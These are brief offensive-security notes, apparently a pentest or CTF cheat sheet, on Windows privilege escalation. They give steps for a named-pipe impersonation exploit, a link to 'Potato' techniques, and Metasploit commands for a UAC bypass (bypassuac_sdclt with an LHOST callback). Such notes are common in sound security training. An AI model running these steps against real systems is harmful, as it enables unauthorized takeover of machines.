9. Using Exploits

Named Pipes:

To exploit:

  1. Make sure SeImpersonatePrivilege is turned on for your current user with:
whoami /priv
  1. Get the script from your computer.
  2. Execute it and win!

Other exploits good to know:
https://jlajara.gitlab.io/Potatoes_Windows_Privesc


Meterpreter UAC bypass:

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
use exploit/windows/local/bypassuac_sdclt
set session <id>
set LHOST <localhost>
run